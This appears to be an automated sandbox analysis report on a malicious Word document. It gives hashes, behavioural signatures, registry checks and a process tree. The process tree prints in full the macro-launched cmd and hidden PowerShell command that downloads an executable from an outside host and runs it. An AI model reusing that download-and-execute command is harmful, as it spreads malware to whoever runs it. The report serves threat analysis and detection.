Analysis
-
max time kernel
50s -
max time network
34s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10-07-2024 21:11
Behavioral task
behavioral1
Sample
31046cbfa8c6364855b43d999a13c67fc72ef56de93a2d0dc5de23fdfb16f923.doc
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
31046cbfa8c6364855b43d999a13c67fc72ef56de93a2d0dc5de23fdfb16f923.doc
Resource
win10v2004-20240709-en
General
-
Target
31046cbfa8c6364855b43d999a13c67fc72ef56de93a2d0dc5de23fdfb16f923.doc
-
Size
110KB
-
MD5
779769658592b517ac94754b2e1440e0
-
SHA1
267ad7195a092fd012c5f7e7bead95ef4628d3cb
-
SHA256
31046cbfa8c6364855b43d999a13c67fc72ef56de93a2d0dc5de23fdfb16f923
-
SHA512
3806f137ce0546814c8ec2fa5f4383893547431fa63c9d8416094c7eaecd188f40361099c68278e3cc0924b1c73d3f7fa3971eb6e1a08fc4b3601187b551bf84
-
SSDEEP
1536:d9ITuk/hms5bEb+FtYuvck3fu6Va8KefAQGQ2ZiYxXJXs:d9MV/XI+FtTvcAU0STi85s
Malware Config
Extracted
http://w2afipbza0zj.pw/blog/wnx0bykhutp2.exe
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 2908 3312 cmd.exe WINWORD.EXE -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 3312 WINWORD.EXE 3312 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4464 powershell.exe 4464 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4464 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
Processes:
WINWORD.EXEpid process 3312 WINWORD.EXE 3312 WINWORD.EXE 3312 WINWORD.EXE 3312 WINWORD.EXE 3312 WINWORD.EXE 3312 WINWORD.EXE 3312 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WINWORD.EXEcmd.exedescription pid process target process PID 3312 wrote to memory of 2908 3312 WINWORD.EXE cmd.exe PID 3312 wrote to memory of 2908 3312 WINWORD.EXE cmd.exe PID 2908 wrote to memory of 4464 2908 cmd.exe powershell.exe PID 2908 wrote to memory of 4464 2908 cmd.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\31046cbfa8c6364855b43d999a13c67fc72ef56de93a2d0dc5de23fdfb16f923.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3312 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c cd decennialimpuredistributorHadesnature & PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://w2afipbza0zj.pw/blog/wnx0bykhutp2.exe','%TEMP%\meld.exe');Start (%TEMP%\meld.exe)2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command (New-Object System.Net.WebClient).DownloadFile('http://w2afipbza0zj.pw/blog/wnx0bykhutp2.exe','C:\Users\Admin\AppData\Local\Temp\meld.exe');Start (C:\Users\Admin\AppData\Local\Temp\meld.exe)3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
16B
MD5d29962abc88624befc0135579ae485ec
SHA1e40a6458296ec6a2427bcb280572d023a9862b31
SHA256a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA5124311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f